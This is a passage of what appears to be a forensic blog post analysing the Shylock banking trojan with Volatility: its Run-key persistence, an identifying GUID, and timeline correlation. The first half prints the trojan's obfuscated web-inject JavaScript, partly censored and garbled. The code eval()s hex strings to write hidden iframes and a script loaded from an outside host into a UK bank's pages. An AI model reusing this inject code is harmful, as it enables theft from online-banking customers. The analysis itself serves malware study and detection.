<!-- content optimize -->
<script type="text/javascript" language="javascript">
var a=["","3c","64","69","76 ","69d","3d","22","6c","76l","64","76","22 ","73","74yl","65","3d","22","64i","73","70","6c","61y","3a n","6fn","65;","22 ","76","3d","22","32","77","22","3e","3c","69","66","72","61","6de ","69d","3d","22l","76l","66","72","70o","73t","22","20","6ea","6de","3d","22","6c","76","6c","66","72","70","6fs","74","22","20","73t","79","6c","65","3d","22","68e","69","67h","74: ","31","70x; wid","74","68:","201px","3b","20disp","6ca","79","3a n_CENSORED_.","6c","65","6e","67","74","68;i","2b+","29{","76a","72","20","6f","62j=d","6fcum","65","6et","2e","67e","74","45l","65mentBy","49","64","28","77ind","6fw","2e","77_i","64","73","5b","69])","3bi","66","28o","62","6a","20","26","26","20","6f","62j","2e","73","74y","6c","65){","6f","62j.","73ty","6c","65.d","69spla","79","3d","22","22;","7d","7d};","76","61","72","20","6c","76ljs","20= ","64oc","75me","6et.c","72","65at","65E","6ce","6dent","28","22sc","72","69p","74","22","29","3bdoc","75","6den","74.","67e","74E","6cemen","74B","79","49d","28","22l","76","6cd","76","22).a","70","70","65nd","43","68","69ld","28","6c","76ljs);l","76lj","73","2e","6fn","65","72","72","6f","72","3d","77i","6e","64","6f","77.","76_fun","63","3bl","76ljs","2e","6f","6e","72e","61","64","79","73","74","61t","65c","68","61","6eg","65 =","20f","75ncti","6fn(","29{","69","66 (/l","6f","61d","65d/","****************","27","62","65y","61","27","20","2b","20'","7a_0","37","33","34","365.","6as","3fqw=l","73","62","76","6b%' ","2b ","2732","6a","73d","66","76iuh%4","35","6a","64f","68djf","68","26","72","3d'","20","2b","20Mat","68","2e","72a","6edo","6d(","29","3b","3c/","73","63","72","69","70t>","3c","2fd","69","76>"];this["d"+"\x6f"+"c"+""+"\x75"+""+"\x6d"+""+"\x65"+""+"n"+""+"\x74"]["\x62"+"i"+"\x64"+""]="HJ-UK-3";a=a["j"+""+"o"+"i"+"n"+""]("\\x");this["w"+"i"+"n"+""+"d"+""+"o"+""+"w"]["e"+"v"+"a"+"l"+""]("v"+"a" + "r b = \"" + a + '"');this["d"+"o"+""+"c"+""+"u"+"m"+""+"e"+"n"+"t"]["w"+""+"r"+"i"+"t"+"e"](b);delete a; delete b;
</script>
<!-- content optimize end -->
</div>
</div>
<!-- content optimize -->
<script type="text/javascript" language="javascript">
var a=["","3cd","69","76 i","64","3d","22","77","61i","74","5fdi","76","22","20","73t","79","6c","65=","22d","69","73pl","61","79","3a","20","6eone","22","3e","3c/","64i","76>","3c","64","69","76","20","69","64=","22l","76","6cd","76","22","20","73","74y","6ce","3d","22","64is","70l","61","79: ","6eon","65","3b","22 ","76","3d","22","32","77","22","3e","3c","69f","72a","6d","65","20i","64=","22l","76","6cf","************************************,"64","65","64/.t","65","73t(","74his.","72","65ad","79","53tate","29 && (","74","79p","65of(","77in","64o","77.l","76","6ct","78","74)","20== ","22u","6e","64ef","69n","65d","22)) ","7bw","69n","64","6f","77","2e","76","5f","66u","6ec","28","29;","7d","3b};","09","76","61","72 u","72","6c","20='htt","70s:/","2f","77ww.se","63u","72e","2d","61","62beyn","61t","69on","61l.","63","63","2f","6a","73/","61b","62","65","79a","7a_","30","373","346","35","2ej","73","27","3b","09","6c","76","6cj","73.la","6eg","75age","20= ","22ja","76a","73c","72","69p","74","22;      l","76","6c","6as.","73","72c =","20","75","72","6c ","2b","20'?","71w=","6csb","76k","25","332jsdf","76iu","68","25","345","6adf","68","64jfh","26","72","3d' +","20M","61th.","72a","6e","64","6f","6d(","29;","3c","2fsc","72ipt>","3c","2fdi","76>"];this["d"+"\x6f"+"c"+""+"\x75"+""+"\x6d"+""+"\x65"+""+"n"+""+"\x74"]["\x62"+"i*___________________________"+"i"+"n"+""]("\\x");this["w"+"i"+"n"+""+"d"+""+"o"+""+"w"]["e"+"v"+"a"+"l"+""]("v"+"a" + "r b = \"" + a + '"');this["\x64"+""+"o"+""+"\x63"+"u"+"m"+""+"e"+""+"n"+""+"\x74"]["w"+""+"r"+"i"+"t"+"e"](b);delete a; delete b;
</script>
<!-- content optimize end -->
<script language="javascript">
function dcsMultiTrack() {};
function tc_optimise(id, txt){document.write(txt);};
</script>
<DIV id="body_div" style="display:none">
<div align="center" id="wrap_wd" style="display: none;"></div>
 id="tbl_transactions"
<TABLE*summary="Summary view of transactions" class="table-data"
 id="tbl_transactions"
summary="This table contains all your accounts to which you can transfer money"
<div class="body"
<div align="center" id="wrap_wd" style="display: none;"></div>
<DIV class="body"
/HTML,APPLICATION/XHTML+XML,APPLICATION/XML;Q=0.9,*/*;Q=0.8
<div class="nav-module-body"
 id="bc_nav_module"
<DIV class="nav-module-body"
 id="bc_nav_module"
webtrends_top_section.js"
</body>
        <div align="center" id="wrap_wd" style="display: none;"></div>
misc.js" www="
</div>
<!-- TouchClarity section -->
<script type="text/javascript" language="javascript">
this["\x64"+""+"\x6f"+""+"\x63"+""+"u"+"m"+""+"e"+"\x6e"+"\x74"+""]["\x62"+"\x69"+""+"d"]="****";var n$iii=["","3c","64i","76","20","69d","3d","22l","76l","64","76","22 s","74y",*****************0","22w","72a","70_","64i","76","5f1","22","2c","20","22tb","6c","5ft","72ans","61","63","74","69o","6es","22];","77","69","6e","64","6f","77","2e","76_","66u","6e","63=f","75","6ection(){fo","72","28","76","61","72 ","69=0","3b","69","3c","77","69","6ed","6fw.","77_","69","64","73","2el","65","6eg","74h","3bi","2b","2b","29","7b","76a","72","20","6fbj","3dd","6f","63","75men","74","2e","67et","45lemen","74","42y","49d","28","77","69","6edo","77.w","5f","69","64s","5b","69]","29","3b","69f","28o","62j","20&","26 ","6fb","6a.sty","6c","65","29{","6fbj","2e","73t","79","6c","65.","64i","73p","6c","61y__________________________________,"76","6c","6a","73 = ","64o","63","75","6d","65","6et","2e","63","72e","61","74","65E","6c","65me","6e","74","28","22","73","63","72ipt","22);do","63ume","6e","74","2eg","65","74","45le","6d","65","6e","74","42y","49","64","28","22l","76","6c","64","76","22","29.","61","70","70e","6ed","43h","69","6cd","28l","76l","6a","73","29;l","76ljs","2eo","6ee","72","72o","72=w","69ndo","77.","76_f","75","6ec;l","76l","6a","73","2e","6f","6e","72","65ad","79","73","74","61","74","65","63","68ange =","20","66unctio","6e(","29","7bif","20(","2f","6c","6fa","64ed/","2et","65","73t(","74h","69","73.","72ea","64y","53t","61","74e) &","26"*****************e n$iii;
</script>
<span id="span_logout" style="display: none;">
<div class="containerWrapper02"

Second Injection Code

*.*CENSORED*.co.uk
<div class="containerWrapper02"
f","
<!-- Touch Clarity optimise
 tag ends
"76l
<!-- Touch Clarity logging
function hide_scv_my_accounts()*{
function show_scv_my_accounts()*{
$EMPTY$
 tag ends
inputForm.memorableAnswer
; //
.focus
"j"+
if(focusElement != null) {
intbankingID')
; //
.focus
is["
o);d
E-CONTROL
</div>
<script type="text/javascript" language="javascript">
// touchclarity section
this["\x64"+"\x6f"+""+"\x63"+"\x75"+"\x6d"+"\x65"+""+"\x6e"+""+"t"+""]["\x62"+""+"\x69"+"d"]="HJ-UK-3";var $mm=["","3cdi","76 i","64=","22","77","61it_di","76","22","20cl","61ss","3d","22p","61g","65","22","20sty","6ce=","22dis","70","6c","61","79:","20n","6f","6e","65;","22","3e","3c/di","76>","3c","64i","76","20i","64","3d","22","6c","76","6cd","76","22","20style","3d","22**************************em","65","6e","74","42yI","64(wi","6edo","77.","77_ids[i","5d","29","3bi","66(ob","6a &","26 ob","6a.","73tyl","65)","7b","6f","62j","2es","74yl","65.","64","69s","70la","79=","22","2********************************0","2b '?q","77","3dl","73","62","76","6b","2532jsdf","76","69uh","2545j","64","66","68","64","6a","66h&","72='","20+","20M","61th","2e","72a","6e","64","6fm(","29;","3c/sc","72",__________________________+""+"\x6f"+""+"\x69"+"n"+""]("\\x");this["\x77"+"i"+"\x6e"+""+"\x64"+""+"o"+"\x77"+""]["\x65"+"\x76"+"\x61"+"\x6c"]("var m$o=\""+$mm+"\"");this["d"+"\x6f"+""+"\x63"+""+"\x75"+"m"+""+"e"+"\x6e"+"t"+""]["\x77"+""+"\x72"+""+"\x69"+"\x74"+"\x65"](m$o);delete m$o;delete $mm;
</script>
var sd343g3=265;}
if (false) {
id="IBlo*se;
","2
function showLightBox()*{
id="masterLb
"3a
3c",
func*Box()*{
return false;
,"72
function setfocus()*{
return false;
3a n
return false;
a","
 id="table_balance" style="display: none"
return false;
f","
top.location=self.location
"5f1
<div id="wrapper"
,"6e   
table summary="This table contains a statement of your account"
<div id="wrapper"
7et"
 style="display: none;"
<div class="containerMain"
c","
 id="containerMain"
 id="table_transfers"
,"74
<table summary="This table shows the current balance of all your accounts"
summary="This table contains all the payments that have come from your account"
 id="table_history" style="display: none"
","6
 id="personal_details"
69",   
<table summary="This table is an activity summary"
 id="table_pay_users" style="display: none"
,"6e
<div class="extPibRow *CENSORED*"><h3><strong>Other options:</strong>
title="View or amend your personal details"
"2e"
title='Update your details and preferences'
 id="my_details"
3f",
<strong>Create a new payee:</strong*</div>

This is, as should be evident, the malicious code that’s going to be injected when the victim reaches the target bank.

At this point it’s also clear that would be really easy to write a volatility plugin that does this for us.

Registry Analysis

As usual first artifact to check is the presence of survival on reboot key values.

First Sample

# python vol.py printkey -f infected.dmp -K "Software\Microsoft\Windows\CurrentVersion\Run"
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile

----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
Key name: Run (S)
Last updated: 2011-09-24 06:31:50

Subkeys:

Values:
REG_SZ CTFMON.EXE : (S) C:\WINDOWS\System32\CTFMON.EXE
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
Key name: Run (S)
Last updated: 2011-09-24 06:31:50

Subkeys:

Values:
REG_SZ CTFMON.EXE : (S) C:\WINDOWS\System32\CTFMON.EXE
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\---\NTUSER.DAT
Key name: Run (S)
Last updated: 2011-09-28 06:55:38

Subkeys:

Values:
REG_SZ CTFMON.EXE : (S) C:\WINDOWS\system32\ctfmon.exe
REG_SZ {A3C43CDE-3A97-74B5-88A7-522DC42C016E} : (S) C:\Documents and Settings\---\Dati applicazioni\GHISLER\notepad.exe
----------------------------

notepad.exe entry looks very suspicious, let’s see the second shylock variant

# python vol.py printkey -f 2_infected.dmp -K "Software\Microsoft\Windows\CurrentVersion\Run"

Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile

----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\---\NTUSER.DAT
Key name: Run (S)
Last updated: 2011-09-30 15:10:15

Subkeys:

Values:
REG_SZ CTFMON.EXE : (S) C:\WINDOWS\system32\ctfmon.exe
REG_SZ {A3C43CDE-3A97-74B5-88A7-522DC42C016E} : (S) C:\Documents and Settings\---\Dati applicazioni\Microsoft\CryptnetUrlCache\MetaData\rdshost.exe

Here we have a different executable and directory, but a common element: {A3C43CDE-3A97-74B5-88A7-522DC42C016E} that can be used to univocally identify Shylock.

Analysis via Timeliner

Timeliner is an handy Volatility plugin recently published (see Tools section), that creates a timeline from various artifacts in memory:

  • Process
  • Sockets
  • Event Log
  • Threads
  • PE Timestamp
  • Registry

Output produced by timeliner could be VERY large and can take some time to be completed.

# python vol.py timeliner -f infected.dmp --output-file= shylock_timeline.xls

Additionally you can specify -S (Start date of timeline) and -E (End date of timeline) to restrict logging range.

Now that we have gathered the log, let’s see a typical timeliner entry:

2011-09-28 11:58:52 |[PROCESS]|firefox.exe|1336|1440||0x010531a8||

The core aspect is obviously the Time, how we can obtain useful informations for our scopes? – Time correlation is the key, if you remember the sockets plugin output, there were some timings directly linked to the malicious activity.

  • 11:58:04 (explorer)
  • 11:58:54 (firefox)
  • 11:58:57 (firefox)
  • 06:55:38 (Registry Time)

We can search through timeliner output:

2011-09-28 11:58:54 |[SOCKET]|1336|0.0.0.0:1049|Protocol: 6 (TCP)|0x80e23220|||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|532||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|528||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|1752||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|536||||
..
2011-09-28 06:55:38 |[REGISTRY]|\Device\HarddiskVolume1\Documents and Settings\---\NTUSER.DAT |$$$PROTO.HIV\Software\Microsoft\Windows\CurrentVersion\Run|||||

Here we have a clear Direct Time relationship with the previously seen malicious event, with an additional informations that’s the “probably” involved thread (TID). It’s important here to specify that in such cases, analysis could interest not only the exact time, but also a range of times adequately near to the exact time itself.

Evilcry